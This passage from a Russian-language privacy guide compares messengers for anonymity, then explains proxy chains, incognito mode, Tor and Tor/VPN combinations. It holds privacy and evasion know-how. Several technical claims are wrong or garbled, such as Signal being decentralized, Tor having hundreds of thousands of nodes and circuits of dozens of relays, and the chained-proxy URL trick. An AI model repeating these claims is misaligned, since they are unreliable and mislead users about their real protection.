Выводы таковы: заполучить действительно анонимную почту не так просто, как кажется на первый взгляд. Те сервисы, о которых кричат во всех статьях вроде "Почта без телефона", оказались, как мы проверили, не такими уже и анонимными. В подтверждение наших слов – одна из таких статей:

https://www.techk47.com/free-email-services-without-phone-verification/

Для конфиденциальной переписки используй шифрование, а для анонимных регистраций используй mailnesia.com.

# 4.4. Какой мессенджер самый анонимный

Не секрет, что все популярные мессенджеры вроде Viber, WhatsApp, Telegram – привязываются к номеру телефона. Давай посмотрим на самые известные мессенджеры и попробуем разобраться, какой можно использовать, а какой стоит удалить со своих устройств прямо сейчас.

# 4.4.1. Telegram

Мессенджер от Павла Дурова, построен на технологии шифрования переписки МТРгою. Много шума вокруг него было, но спустя некоторое время, как нам кажется, это был продуманный и тщательно спланированный PRход. Почему?

E2EE-чаты (чаты End-to-End-Encryption, чаты со сквозным шифрованием) реализованы как секретные чаты, но не используются по умолчанию. Обычные чаты не шифруются вообще никак. Можешь себе представить, что все, что ты пишешь своим друзьям в обычных чатах, – вообще никак не шифруется?!

Мессенджер неоднозначный. Вокруг него много шума, а в сухом остатке неясно, ради чего: доступа к исходникам – нет, чаты по умолчанию не шифруются, нет защиты социального графа (все твои контакты хранятся на серверах Telegram), нет групповых E2EE-чатов, E2EE-чаты не поддерживаются в настольной версии программы, только в мобильной, мессенджер централизованный, сообщения хранятся на сервере (и, как уже было отмечено, не зашифрованы) и при всем этом отсутствует возможность анонимной регистрации. Из-за чего шум-то, господа?

Если ты хочешь использовать Telegram, то пользуйся хотя бы секретными чатами. Для создания секретного чата в меню мобильной версии нужно выбрать команду New Secret Chat. Настольная версия секретные чаты не поддерживает, следовательно, ни о какой синхронизации секретных чатов между мобильной и настольной версией речи быть не может. В секретном чате сообщения шифруются и не хранятся на серверах мессенджера. Также нельзя сделать скриншот секретного чата, но ничто не мешает сделать его фотографию с другого телефона.

## 4.4.2. Viber

Viber – интересный мессенджер. С одной стороны, он проприетарный, централизованный, привязывается только к номеру телефона, не обеспечивает защиту социального графа. С другой стороны, сквозное шифрование включено по умолчанию, даже в настольной версии, а для дополнительной безопасности предназначены секретные чаты. Также поддерживаются групповые E2EE-чаты.

Секретные чаты позволяют настроить таймер самоуничтожения для каждого сообщения – сообщение будет удалено через установленное время после го просмотра – как с твоего устройства, так и со всех устройств получателей. Сообщения секретного чата защищены от пересылки, а скриншоты или выключены, или оставляют уведомление на экране чата.

Для перехода в секретный чат нужно открыть чат с пользователем и выбрать из его меню команду **Перейти в секретный чат**. Секретный чат будет отмечен замком.

Кроме секретных чатов, Viber поддерживает скрытые чаты, позволяющие не отображать выбранные чаты на экране чатов в приложении. Чтобы получить доступ к скрытому чату, нужно ввести установленный ранее PIN-код. Это дополнительная защита на тот случай, если телефон попадет в чужие руки.

В общем-то все неплохо, даже получше, чем у Telegram, если бы не привязка к номеру телефона.

# 4.4.3. WhatsApp

WhatsApp использует Signal Protocol. Означает ли это, что он такой же безопасный, как и Signal? Давай посмотрим.

Конечно, этот мессенджер интересен тем, что не хранит твои сообщения на своих серверах. Вместо этого сообщения хранятся на твоем телефоне. Во время бэкапа они могут храниться на каких-либо других серверах. Например, если у тебя iPhone, то при бэкапе телефона сообщения WhatsApp будут помещены в iCloud вместе с другими данными.

Основная проблема в том, что WhatsApp собирает всевозможную информацию о тебе – так называемые метаданные, в том числе все телефонные номера в твоей адресной книге и всевозможные другие данные.

Что такое метаданные? Приложение записывает, кому и во сколько ты звонил, сколько длился разговор, но сам разговор не записывается. Оно "логирует" кому и когда ты писал. Например, в 2:30 ты звонил в "секс по телефону" и твой разговор длился 24 минуты. Согласись, никто "не догадается", о чем был разговор, – ведь сам разговор не записан.

Кроме этого, WhatsApp собирает тонны информации о пользователей – модель его телефона, его ОС, информацию, полученную от браузера, IP-адрес, мобильный номер и т.д.

Спасает лишь то, что E2EE-чаты используются по умолчанию и есть возможность групповых зашифрованных чатов. Учитывая все вышесказанное и то, что мессенджер является проприетарным со скрытым кодом, то все выглядит не очень хорошо. Если хочешь анонимности, лучше не устанавливать его на свой телефон. Может, никто и не перехватит твои сообщения, но сам мессенджер будет знать о тебе все.

# 4.4.4. Signal

Мессенджер Signal использует собственный протокол Signal Protocol, который также используют и другие мессенджеры – WhatsApp, Facebook Messenger, Google Allo.

Signal Protocol – это криптографический протокол, который может быть использован для сквозного (end-to-end) шифрования звонков (голосовых и видео), а также обычных сообщений.

Казалось бы, если Facebook Messenger и Google Allo используют этот же протокол, то они так же безопасны, как и Signal. Но, как показывает практика – нет. В отличие от Signal, где шифрование включено по умолчанию, в этих мессенджерах оно выключено. Для его включения в Facebook Messenger нужно включить "Secret Conversations", а в Google Allo – включить режим инкогнито (Incognito Mode).

На первый взгляд, мессенджер Signal значительно безопаснее. Во-первых, он децентрализованный, во-вторых, открыт всем желающим его исходный код, есть поддержка групповых E2EE-чатов, есть защита социального графа, поддерживаются исчезающие по таймеру сообщения. Но этот мессенджер не является анонимным. При регистрации нужно указывать номер телефона, к которому мессенджер и привязывается.

Что же касается исчезающих сообщений, то это "фишка" не только этого мессенджера. Подобное решение и в Telegram (в меню секретного чата нужно выбрать команду Set self-destruct timer), и в Viber.

# 4.4.5. Briar

Основан на технологии децентрализованных сетей (mesh), может работать через Bluetooth, Wi-Fi или через Интернет (Tor). По умолчанию предусмотрено оконечное шифрование сообщений. Briar – не очень популярный мессенджер, и готовы поспорить, что далеко не каждый знает о его существовании. Но на деле он очень хорош – он может работать через Tor, он децентрализованный с открытым исходным кодом, есть возможность анонимной регистрации и использования (не нужно указывать ни номер телефона, ни e-mail), а чаты шифруются по умолчанию, причем не хранятся на серверах Briar (то есть твои сообщения в зашифрованном виде хранятся только на твоем телефоне). Есть защита социального графа (никто никому не сливает твою адресную книгу), есть групповые E2EE-чаты, но нет синхронизации E2EE-чатов между устройствами, поскольку нет возможности использовать одну и ту же учетку на разных устройствах. На фоне всех остальных мессенджеров Briar выглядит идеально, если нужна анонимность общения.

Но у него есть и недостатки: нет версии для iPhone, нет возможности голосовых звонков. Если с отсутствием голосовых звонков еще можно мириться – не всем они нужны, то вот отсутствие версии для iPhone существенно ограничивает круг общения.

# 4.4.6. Мессенджеры социальных сетей

Практически у каждой социальной сети есть свой мессенджер. У Facebook – Facebook Messenger, у Моего мира – ТамТам и т.д.

При создании ТамТам (разработка Mail.ru Group) никто не делал упор на безопасность и это нужно учитывать при выборе этого мессенджера. Привлекает в нем то, что возможна регистрация при использовании Google-почты или через социальную сеть Одноклассники. То есть анонимная регистрация без привязки к номеру телефона таки возможна. Но, несмотря на это, шифрование сообщений не поддерживается (во всяком случае, разработчике нигде об этом не говорят), не производится защита социального графа. Другими словами, даже если ты анонимно зарегистрируешься, по незашифрованным сообщениям, все равно будет понятно, кто ты. Однозначно данный мессенджер не подходит для анонимного и безопасного общения.

Мало кому в голову придет желание использовать ВКонтакте как средство для анонимного общения. Сообщения хранятся на серверах соцсети, не шифруются, регистрация только по номеру телефона, в общем полный набор. Однозначно не рекомендуется к использованию.

Мессенджер от Facebook построен на базе открытого протокола MQTT (это протокол обмена сообщениями, не нужно путать его с протоколом шифрования). После его выхода была отключена возможность отправки сообщений

в фейсбуке, что вынудило пользователей устанавливать это приложение. Но можно зарегистрироваться и не имея учетной записи в фейсбуке.

Если сравнивать Вконтакте и Facebook Messenger, то Facebook на его фоне выглядит значительно лучше. Во-первых, есть возможность анонимной регистрации с использованием электронной почты. Во-вторых, поддерживаются E2EE-чаты, но не по умолчанию. Для включения шифрования сообщений нужно включить "Secret Conversations". Однако Facebook собирает очень много всевозможной информации о пользователе, поэтому вряд ли подойдет для безопасного общения. Также не поддерживается синхронизация E2EE-чатов, нет уведомления о необходимости проверки отпечатков, нет групповых зашифрованных чатов и нет защиты социального графа.

## 4.4.7. WickrMe

Претендует на звание самого анонимного мессенджера. По умолчанию включено E2EE-шифрование, нет привязки к номеру телефона, твои сообщения хранятся только на твоем устройстве и то только некоторое время, а потом автоматически удаляются. У приложения нет доступа к твоим контактам. С одной стороны, это не очень удобно, с другой никто даже не узнает, что ты ним пользуешься, только если ты сам не предоставишь свой логин в WickrMe. Есть версии для Windows, iOS, Android.

На сайте https://wickr.com/privacy/ разработчики пишут, что они не хранят пользовательские сообщения на сервере (в это можно поверить, поскольку история чата не синхронизируется – то, что ты писал на мобильном, там и останется – на десктопе этих сообщений не видно) и что не хранят ключей для расшифровки сообщений.

Обрати внимание на эту информацию:

Will Wickr Notify Users of Requests for Account Information? Wickr's policy is to notify users of requests for their account information prior to disclosure including providing user with a copy of the request, unless we are prohibited by law from doing so or if there is danger of death or serious physical injury. As soon as legally permitted to do so, we will notify our users of requests for their information. Если вкратце, то политика Wickr в отношении запросов об информации в аккаунтах следующая: о таком запросе вам будет прислано уведомление (то есть вы узнаете, что за вами следят) – вы получите даже копию запроса.

И еще посмотри вот на это:

Contents of Communications Are Not Available . Requests for the contents of communications require a valid search warrant from an agency with proper jurisdiction over Wickr. However, our response to such a request will reflect that the content is not stored on our servers or that, in very limited instances where a message has not yet been retrieved by the recipient, the content is encrypted data which is indecipherable.

Wickr может принять запрос на передачу контента от правоохранительных органов, но ответом будет то, что содержимое не хранится на серверах Wickr, поэтому не может быть им передано.

При регистрации в Wickr нужно указать только логин (он не должен быть занят) и пароль. Все. Ни е-mail, ни номера телефона. На данный момент – это очень неплохой вариант для конфиденциального общения.

Основные особенности приложения:

- Приложение доступно на платформах iOS, Android, Windows, Mac OS X, Linux.
- Мессенджер не привязывается к номеру телефона, для регистрации в нем нужно указывать e-mail. Все, что нужно, указать ID, который еще не занят другими пользователями. После этого вы можете общаться.
- При начале работы в мессенджере нужно найти своих друзей через ID. Если Ваших друзей нет в Wickr, то Вы можете отправить им приглашение через SMS или e-mail.
- Wickr умеет пересылать текстовые и голосовые сообщения, но в нем нельзя осуществлять видеозвонки. Но это не недостаток: вы ведь в большинстве случаев обмениваетесь как раз текстовыми сообщениями и картинками. Голос и видео используются реже.
- Сообщения будут самоуничтожаться как на устройстве отправителя, так и на устройстве получателя через некоторое время. Пользователь может

самостоятельно выставить таймер для стирания сообщения. Время можно выставить от одной секунды до нескольких дней.

- Приложение использует протоколы шифрования AES 256, ECDH521 и RSA 4096. Компания-разработчик мессенджера придерживается политики защиты пользовательских данных: никакие данные пользователей не остаются на серверах Wickr.
- В мессенджере можно создать групповой чат, количество участников которого не превышает 10 человек.
- Мессенджер не сливает контакты. Ему вообще можно запретить доступ к контактам, и он будет прекрасно работать.
- Отсутствие возможности сделать скриншот переписки.

#### 4.4.8. Wire

Wire – тоже очень неплохой вариант. Во-первых, есть возможность анонимной регистрации. Во-вторых, по умолчанию поддерживается сквозное (E2EE) шифрование, даже с возможностью синхронизации зашифрованных чатов. В-третьих, есть защита социального графа, поддерживаются групповые зашифрованные чаты (до 128 человек), безопасные конференц-звонки (до 10 человек) и есть возможность уведомления о необходимости проверки отпечатков E2EE. Что-то подобное мы видели в Briar, но здесь огромный выбор поддерживаемых платформ – Android, iOS, Windows, macOS, Linux. Должна быть ложка дегтя? Так и есть: мессенджер платный и стоит 6 евро в месяц. Учитывая, что можно бесплатно использовать WickrMe, не видимо особой необходимости в этом мессенджере.

Что касается анонимной регистрации, то мессенджер привязывается к почте. Как было показано ранее, можно получить анонимный почтовый адрес, так что проблем с анонимизацией при регистрации в этом мессенджере не будет.

# Глава 5.

# Анонимность в Интернете. Возможно ли?

Ранее, в главе 1, было показано, как посещать заблокированные сайты. Но будут ли наши посещения анонимны? И вообще как можно сохранить анонимность при работе в Интернете. Поговорим об этом в данной главе.

# 5.1. Частичная анонимность

Спрятали IP-адрес, передаем данные по зашифрованному соединению, да еще и из США или Люксембурга. Мы крутые хакеры! На самом деле это не так и никакой анонимности нет даже при использовании VPN, не говоря уже о других способах обхода скрытых сайтов, описанных в главе 1.

Первым делом вам нужно определиться, зачем тебе нужна анонимность. Существует два основных мотива. Первый мотив – не хочется, чтобы провайдер или кто-либо еще видел, какие сайты ты посещаешь, какие данные передашь по Интернету. Ты не собираешься совершать какие-либо незаконные действия – не будешь взламывать банки, публиковать видео для взрослых и совершать другого рода правонарушения. В этом случае тебя никто не будет искать, и ты никому не интересен. В данном случае достаточно выбрать любой VPN-сервис, описанный в главе 1, и успокоиться. Твой провайдер не будет видеть, что ты передаешь и какие сайты посещаешь. При желании можно посещать сайты в режиме инкогнито, чтобы история не сохранялась на локальном компьютере. Частичная анонимность достигнута, и можно переходить к чтению следующей главы.

А что если ты будешь совершать противоправные действия? Тогда тебя будут искать. Любой VPN-сервис, прежде всего, хочет обезопасить самого себя и безопасно получить прибыть. До анонимности самих клиентов ему, по сути, нет никакого дела. Представим, что ты взломал сайт через VPN. Обнаружить тебя – плевое дело. Сначала будет вычислен IP-адрес VPN-сервиса, затем будет обращение правоохранительных органов к этому сервису, а дальше – уже дело техники. VPN-провайдер хранит подробные логи, в которых видно,

кто, когда и куда подключался. Будут ли тебя вычислять или нет, все зависит от масштабов бедствия. Если ты по-крупному насолишь, тебя найдут. Если по мелкому напакостишь, тебя искать никто не будет. Да, увидят IP-адрес VPN-сервиса. Далее нужно обращение в правоохранительные органы, официальные запросы, суды и т.д. Все это растянется во времени, и если правонарушение было один раз и финансовые потери жертвы небольшие, никто тебя не найдет. Но при систематических правонарушениях ты должен понимать, что тебя вычислят и технически это несложно.

Конечно, существуют еще и перфекционисты. Они не собираются совершать незаконных действий, но при этом они не хотят, чтобы даже VPN-провайдер знал, какие сайты они посещают и какие данные передают.

Специально для таких пользователей и предназначена данная глава. В ней мы рассмотрим способы, позволяющие получить настоящую анонимность. Если тебя раскроют, то только благодаря человеческому фактору, то есть ты сам оставишь след и сделаешь что-то не так. Итак, сейчас мы поговорим о цепочках прокси и о легендарном проекте Tor.

Примечание. В каждом современном веб-браузере есть режим инкогнито, для входа в который нужно нажать Ctrl + Shift + N. Важно понимать, что на самом деле ни о какой анонимности речи не идет. Просто браузер не будет сохранять некоторые данные, такие как историю посещений, файлы Cookies. Но все твои действия будут видны сайтам, которые ты посещаешь (они будут видеть ваш IP-адрес), твоему сисадмину и интернет-провайдеру. Подробно об этом написано при входе в режим инкогнито в браузере Chrome (рис. 5.1). Режим инкогнито бывает полезен, чтобы на локальном компьютере не сохранялась лишняя информация.

Примечание. В некоторых случаях бывает полезен постоянный запуск в режиме инкогнито, например, когда не нужно, чтобы история посещенных сайтов сохранялась на компьютере. Ее всегда можно очистить, нажав Ctrl + Shift + Del, но ведь и можно забыть это сделать! Итак, открой Chrome и введи адрес chrome://flags. Включи (установи значение Enabled) для опции Enable Incognito Desktop Shortcut. После перезапуска браузера в режиме инкогнито появится возможность создать ярлык для запуска браузера в режиме инкогнито. В этом случае при запуске браузера тебе больше не нужно будет нажимать Ctrl + Shift + N для входа в этот режим.



Рис. 5.1. Подробно о режиме инкогнито



Рис. 5.2. Экспериментальные настройки Chrome

# 5.2. Цепочки прокси

В главе 1 были рассмотрены анонимные прокси-серверы. Для простых задач вроде смена IP-адреса и посещение закрытых сайтов они вполне могут

.....................

сгодиться. Но проблема в том, что прокси-сервер знает, кто ты – он "видит" твой IP-адрес. Вторая проблема – ты не знаешь, кто именно настроил этот прокси-сервер. Представь следующее: ты находишься где-то, где запрещен Facebook, например в Иране или Китае. Ты хочешь зайти на свою страничку, и тебя блокируют. Ты находишь анонимный прокси с хорошей скоростью и подключаешься к нему. Представь еще, что этот прокси настроен спецслужбами. Они увидят, что ты обошел запрет, и в ближайшие несколько лет из Ирана ты уже не выедешь. Наказания за нарушения закона там очень суровые, и одним только штрафом не обойдешься.

Одна из тактик правильного обхода запрета – формирование так называемых цепочек прокси.

Ты подключаешься к **прокси-серверу A**, затем через него – к **серверу Б**, а уже после – к нужному тебе сайту. Можно сформировать цепочку не из двух, а из трех-четырех прокси, чтобы еще больше запутать следы.

Прокси А будет видеть твой IP-адрес, но результирующий сайт увидит IPадрес даже не прокси А, а прокси Б. Прокси Б увидит IP-адрес проксисервера А. Чем больше прокси в цепочке, тем надежнее.

Сформировать цепочку прокси можно в самом браузере, и не нужно даже использовать никакой дополнительный софт. Для этого в адресной строке введи URL:

#### https://npoкcuA:nopm/https://npoкcuБ:nopm/https://www.xakep.ru

Последний узел – это сайт, который ты хочешь посетить анонимно. Разумеется, желательно использовать режим инкогнито браузера, дабы сайт не смог получить лишней информации о тебе, а выбранные **прокси A** и **прокси Б** должны поддерживать HTTPS.

Можно еще использовать специальный софт. Например, прогу CPconnect (адрес без проблем найдешь в Интернете), но в ней нет ничего особенного и принцип тот же – вводишь несколько адресов прокси и целевой сайт.

Использовать цепочки прокси можно, но довольно неудобно. Представь ситуацию, когда ты сформировал цепочку до сайта www.xakep.ru, а на этом сайте есть ссылка на другой сайт, которая открывается в новом окне. Соединение с новым сайтом пойдет уже напрямую без всяких прокси. Анонимность будет потеряна. Поэтому гораздо удобнее использовать браузер Tor, который мы рассмотрим в следующем разделе. Прежде чем мы начнем разбираться с Tor, нужно уяснить два факта:

- 1. Тог бесплатный браузер. В отличие от VPN-сервисов, которые практически все платные, Тог был, есть и будет бесплатным. За ним не стоит какая-либо компания, собирающая все данные о тебе.
- 2. Загружать Тог нужно только с сайта https://www.torproject.org/. На всех остальных сайтах, какими бы "плюшками" тебя ни заманивали, загружать Тог нельзя, поскольку нет уверенности, какие еще изменения (кроме тех самых "плюшек") внесли в браузер может, он отправляет все твои данные, пароли прямо в ... ну, ты сам догадался!

# 5.3. Проект Tor

# 5.3.1. Что такое Tor

**Тог** – это одновременно браузер (компьютерная программа) и сеть, на основе которой он работает. Название является сокращением от *The Onion Router* (англ. луковичный маршрутизатор). Луковичной эту сеть назвали потому, что в ней задействовано несколько слоев шифрования, защищающих онлайн-конфиденциальность пользователей, как несколько слоев в луковице окутывают сердцевину. Главная задача Tor Browser – сокрытие следов пользователя в Интернете. За счет этого можно работать в сети полностью анонимно.

Тог – это не VPN-сервис и не браузер со встроенным модулем VPN, как многие считают. Для еще большей защиты можно использовать и Tor, и VPN. Или же торифицировать весь свой трафик, но не факт, что все сетевые программы будут работать в этом случае корректно. Важно сейчас понимать, что вот ты загрузил и запустил Tor. Все, что ты делаешь в браузере Tor, – конфиденциально. Все что ты делаешь в любой другой сетевой программе (другой браузер, Skype, Viber и т.д.), – нет. Если же торифицировать трафик, то есть направить весь свой трафик через Tor, анонимность будет обеспечиваться, но тоже не полностью – все зависит от данных, которые ты предоставил программам, которые будут работать через Tor. Например, если ты в Skype указал свои имя и фамилию, привязал его к своему номеру телефона, то без разницы, как он будет работать – через Tor или нет – анонимности уже не будет. Далее мы об этом еще поговорим. Использовать Tor – просто. Гораздо сложнее – использовать его правильно. Браузер Тор создавался по заказу военно-морских сил США, его задачей была защита переговоров во время разведывательных операций. Сейчас же Тог – это некоммерческая организация, занимающаяся исследованиями и созданием инструментов конфиденциальности и анонимности в Интернете.

# 5.3.2. Как работает браузер Тог

Для работы с Tor нужно скачать и установить Tor Browser – собственно браузер, настроенный на работу с одноименной сетью. Им нужно пользоваться вместо Chrome, Firefox или любого другого браузера, который ты обычно использовал. Все, что ты делаешь через браузер Tor, не видно правительству, хакерам и рекламщикам.

Все твои данные собираются в зашифрованные пакеты еще до того, как они попадут в сеть Тог. Далее Тог убирает часть заголовка пакета, в котором содержатся сведения об источнике, размере, месте назначения и времени, – то есть все, что можно использовать для идентификации отправителя (то есть тебя).

Затем браузер Тор шифрует оставшуюся информацию, что невозможно при обычном интернет-подключении. Наконец, зашифрованные данные пересылаются через множество серверов, выбранных случайным образом (через цепочку Tor).

Каждый из серверов расшифровывает и снова зашифровывает только те данные, которые необходимы для определения, откуда был получен пакет, и для дальнейшей передачи данных. Таким образом достигается анонимность.

Зашифрованные адресные слои, которые используются для анонимизации пакетов данных, пересылаемых через сеть Tor, похожи на слои лука. Именно отсюда и берет свое название эта сеть. Ниже приведена иллюстрация, которая довольно точно изображает принцип работы сети и браузера Tor, хотя и несколько упрощенно (рис. 5.3). Эта картинка из официальной документации Tor – мы ничего не добавили, не убрали и не извратили. Красной пунктирной линией помечены незашифрованные данные, все остальное – зашифровано. По сути, не шифруется только отрезок между выходным узлом (ExitNode) – последним узлом в цепочке Tor, и компьютером назначения. Если направить на компьютер назначения зашифрованные данные, то он не сможет их расшифровать, поскольку ничего не знает ни о Tor, ни о его шифровании. Для него все выглядит так, как будто бы к нему обращается непосредственно ExitNode.

.............

Вот что нужно знать о Tor:

- Администратор твоей сети (или администратор провайдера) не сможет узнать, какие данные ты передаешь, поскольку данные передаются в зашифрованном виде;
- Администратор твоей сети не сможет узнать, какой узел ты посещаешь, поскольку вместо интересующего тебя узла (facebook.com) твой комп формально будет обращаться к одному из узлов сети Tor — ничем не примечательному узлу с непонятным доменным именем. Тем более что при каждом новом подключении к Tor первый узел цепочки будет другим;
- Если администратор сети заблокировал доступ к интересующему тебя сайту (facebook.com) на брандмауэре, ты сможешь обойти это ограничение, поскольку фактически твой компьютер подключается к совершенно другому узлу (к узлу цепочки Tor). Запрещать доступ к этому узлу нет смысла, так как при следующем подключении к Тог или при принудительной смене цепочки узел входа в Тог будет изменен;
- Удаленный узел "увидит" только IP-адрес последнего узла цепочки, твой IP-адрес будет скрыт;
- Теоретически перехват данных возможен на последнем участке пути от последнего узла цепочки Тог до удаленного узла. Но для этого нужно отследить всю цепочку Тог, что технически сделать очень сложно, поскольку она может состоять из десятков узлов. Если же получить доступ к удаленному узлу, то все равно нельзя будет понять, кто есть кто, поскольку для этого нужно знать как минимум точку входа и точку выхода сети Tor.



Рис. 5.3. Принцип работы Тог

При подключении к сети Тог для твоего компа определяется точка входа (выбирается случайный узел из сотен тысяч узлов Tor), "тоннель" и точка выхода — то есть строится цепочка. В процессе работы с сетью иногда возникает необходимость сменить цепочку — это можно сделать без перезагрузки программного обеспечения (позже будет показано, как), что делает работу с сетью максимально комфортной.

Смена цепочки может понадобиться в двух случаях:

- 1. Когда нужно сменить конечный IP-адрес (например, чтобы получить IPадрес, относящийся к определенной стране или городу);
- 2. Когда полученная цепочка оказалась довольно медленной. Можно создать другую цепочку вдруг она окажется быстрее?

Проект Тог кросс-платформенный. Это означает, что клиенты для подключения к Тог есть для Windows, Linux и MacOS. Скачать программное обеспечение для настольных систем абсолютно бесплатно можно по адресу:

#### https://www.torproject.org/

Нужно отметить, что Тог полностью бесплатный – не нужно никому платить ни за передаваемый трафик, ни за программное обеспечение. В этом его главное и принципиальное отличие от VPN-сервисов. Но и еще одно не менее важное отличие – при каждом подключении к Тог выбирается другая цепочка – другой узел входа и другой узел выхода (хотя в конфигурационных файлах Тог можно изменить это поведение). При использовании VPN-сервисов сервер у тебя будет один, максимум – несколько штук. При желании можно полностью тебя идентифицировать и выяснить, кому и какие данные ты передаете (конечно, если дело дойдет до международного скандала). В случае с Тог такая задача существенно усложняется. Так как цепочку передачи данных можно менять совершенно свободно – хоть каждые несколько минут.

## 5.3.3. Кто и зачем использует Tor?

Тог скрывает твою настоящую личность за счет переноса трафика на различные Тог-серверы. Это дает полную анонимность и безопасность от всех, кто попытается отследить твои действия (будь то правительство, хакеры или рекламодатели). Tor – это своего рода ворота в скрытый Интернет (Deep Web, Dark Web). Пусть тебя не пугает это название. Как ни странно, на долю скрытого интернета приходится львиная доля всей сети. Речь идет просто о сайтах, которые не проиндексированы ни одной поисковой системой. Представь себе айсберг. Его верхушка проиндексирована поисковыми системами, а подводная часть и есть скрытая часть сети.

Многие такие сайты были случайно пропущены поисковыми системами, а некоторые специально избегали контакта с поисковиками. Ярким примером сайтов второго типа являются различные онлайн-магазины наркотиков и оружия. Но Tor нужен не одним лишь киберпреступникам. Он очень популярен среди журналистов, правозащитников и пользователей из стран с интернет-цензурой. Для всех таких людей очень важна анонимность в сети.

Тог не просто скрывает интернет-активность пользователя, но и дает возможность обойти блокировки. Например, с Тог работал Эдвард Сноуден.

# 5.3.4. Что лучше: VPN или Tor?

В этой книге были рассмотрены два альтернативных подхода к шифрованию передаваемого по сети трафика – VPN-сервисы и Тог. Какой способ выбрать?

Ничего не остается, как сравнить эти два способа.

## Преимущества VPN:

- Удобство использования. Некоторые VPN-сервисы предоставляют собственные VPN-клиенты, которые практически не нужно настраивать. Нужно только запустить их и наслаждаться зашифрованной передачей данных.
- Весь трафик, генерируемый вашим устройством, будет зашифрован. При этом пользователю не нужны права root. В случае с Tor нужны права root для запуска прозрачной проксификации (режим VPN). В противном случае будет шифроваться трафик приложений, поддерживающих Orbot, трафик остальных приложений шифроваться не будет.
- Высокая скорость доступа. Скорость доступа к Интернету через VPNсервис будет немного ниже, чем скорость обычного доступа к Интернету, но все же будет на довольно высоком уровне.

На этом преимущества VPN-сервисов заканчиваются и начинаются недостатки:

- Не всегда есть собственные VPN-клиенты, и не все клиенты поддерживают все распространенные протоколы. Хорошо, что все VPN-сервисы поддерживают протокол PPTP, который поддерживает встроенный VPN-клиент Android.
- Доступ к VPN-серверам платный, и не все предоставляют тестовый период. "Сначала деньги, вечером стулья".
- В большинстве случаев выбор точек присутствия ограничен. Как правило, можно выбрать сервер из США, Канады и нескольких европейских стран. Российские и близлежащие VPN-серверы из соображений конфиденциальности данных использовать нельзя при малейшем подозрении вся информация о вас будет передана куда нужно. Поэтому в этой книге рассматриваются только зарубежные серверы. Даже если кто-то сильно захочет узнать, что пользователь делал в Интернете и кому что передавал, международная бюрократия даст огромную фору во времени.
- Вся активность пользователя протоколируется и хранится на серверах VPN-сервиса несколько лет. Выводы делай сам. По сути, это и есть самый значительный недостаток коммерческих VPN-сервисов.

Теперь рассмотрим преимущества Tor:

- Самое огромное преимущество сети Тог это свободный проект, узлами сети Тог выступают машины энтузиастов и никакая информация о твоей активности не записывается. К тому же каждый следующий узел в цепочке Тог не знает о тебе ничего, кроме того, что данные пришли с предыдущего узла. Проследить цепочки Тог очень сложно с технической точки зрения.
- При включенной прозрачной проксификации через Tor могут работать любые сетевые приложения.
- Сеть Тог абсолютно бесплатная, никому ничего платить не нужно.
- Огромный выбор точек присутствия. В каждой стране есть узлы Tor, и можно выбрать выходной узел с любым нужным IP-адресом.

Недостатки у Тог тоже есть:

- Не очень высокая скорость доступа. С каждым годом ситуация становится лучше, так как увеличивается пропускная способность каждого Torузла.
- Чтобы заработала прозрачная проксификация в Android, нужны права root. Их получение не всегда оправдано. Без прав root с Orbot (Tor) будут работать только определенные приложения, "заточенные" под Tor. А таковых совсем мало. Если, конечно, тебе нужен только браузер, то это совсем не проблема.

Учитывая все сказанное, наиболее оптимальный выбор – Тог, даже несмотря на некоторые проблемы с прозрачной проксификацией. При желании и необходимости в еще большей анонимности можно использовать Tor и VPN вместе.

## 5.3.5. Tor и VPN

Браузер Тог и VPN можно использовать одновременно, хотя придется немного повозиться с настройками. Есть две схемы: VPN через Тог и Тог через VPN. В каждом случае настройки конфиденциальной работы сильно отличаются.

Мы не будем вникать во все подробности (тебе этого и не нужно), но основные моменты поясним. А пока отметим важный факт: как бы ни настроить подключение, Тог и VPN вместе сильно замедляют скорость передачи данных. Такова плата за повышенную приватность работы в Сети. Хотя нужно отметить, что в последнее время существенно выросла скорость работы как VPN-соединений, так и сети Тог, так что замедление, разумеется, будет, но все будет в пределах нормы.

## **Тог через VPN**

Принцип такой. Ты запускаешь VPN-соединение, а потом уже запускаешь Tor. То есть Tor будет работать через VPN. Цепочка будет выглядеть так:

Твой комп > VPN > Tor > Интернет

Преимущество такого способа в том, что провайдер не увидит, что ты используешь Tor (некоторые провайдеры умеют блокировать Tor), хотя он увидит, что ты используешь VPN. Но при этом сам Tor не увидит твой IP-адрес при входе в сеть Tor, что можно считать дополнительной мерой безопасности. В свою очередь, VPN-провайдер не увидит, что вы делаете, поскольку все будет зашифровано сетью Tor, что тоже преимущество на фоне того, что провайдеры логируют все действия пользователей.

Недостаток в том, что VPN-сервис увидит твой настоящий IP-адрес. Некоторые VPN-сервисы (NordVPN, Privatoria, TorVPN) имеют настройки для создания подключений типа Tor-through-VPN. Это хорошо, но использование браузера Tor, обеспечивающего сквозное шифрование, все равно лучше.

# VPN через Tor

При использовании VPN чрез Тог цепочка выглядит так:

#### Твой комп > Tor > VPN > Интернет

Этот тип подключения безопаснее первого, он обеспечивает практически полную анонимность и конфиденциальность работы в Интернете.

Однако существует всего два VPN-сервиса, поддерживающих такие подключения, а именно AirVPN и BolehVPN. Если тебя не смущает столь малый выбор, то VPN через Tor – более предпочтительный вариант.

Во-первых, VPN-сервис не знает твой настоящий IP-адрес, а видит лишь IPадрес точки выхода из сети Tor. Если ты забрался так далеко, то стоит платить за VPN лишь с помощью биткоинов и только через браузер Tor. В таком случае у VPN-сервиса не будет ни единой зацепки, по которой тебя можно идентифицировать, даже если сервис ведет логи.

Другой однозначный плюс – защита от опасных точек выхода из сети Tor (спасибо VPN-сервису, который шифрует твои данные).

Этот метод позволяет обойти любые блокировки точек выхода сети Tor, с которыми можно столкнуться, используя подключение типа Tor через VPN.

Если ты не хочешь возиться с настройкой подключения VPN через Tor, ты всегда можешь подключиться по схеме Tor через VPN. Для этого нужно подключиться к VPN-сервису, а затем запустить браузер Tor.

----

# 5.3.6. Использование браузера Tor в Windows

Чтобы начать использовать Tor, нужно скачать браузер Tor. Это особым образом настроенный браузер Firefox. После загрузки нужно установить Tor как обычную программу. Ярлык будет создан на рабочем столе автоматически, можно переместить его на панель задач для большего удобства. Tor устанавливается как обычная программа и не требует каких-либо специальных знаний.

Щелкните по ярлыку, и появится диалоговое окно с двумя вариантами: подключаться сразу (кнопка **Connect**) или сначала настроить прокси (кнопка **Configure**). Если ты хочешь настроить соединение типа VPN через Tor (либо подключаешься через прослушиваемую или цензурируемую сеть), нужно выбрать второй вариант и настроить все вручную.

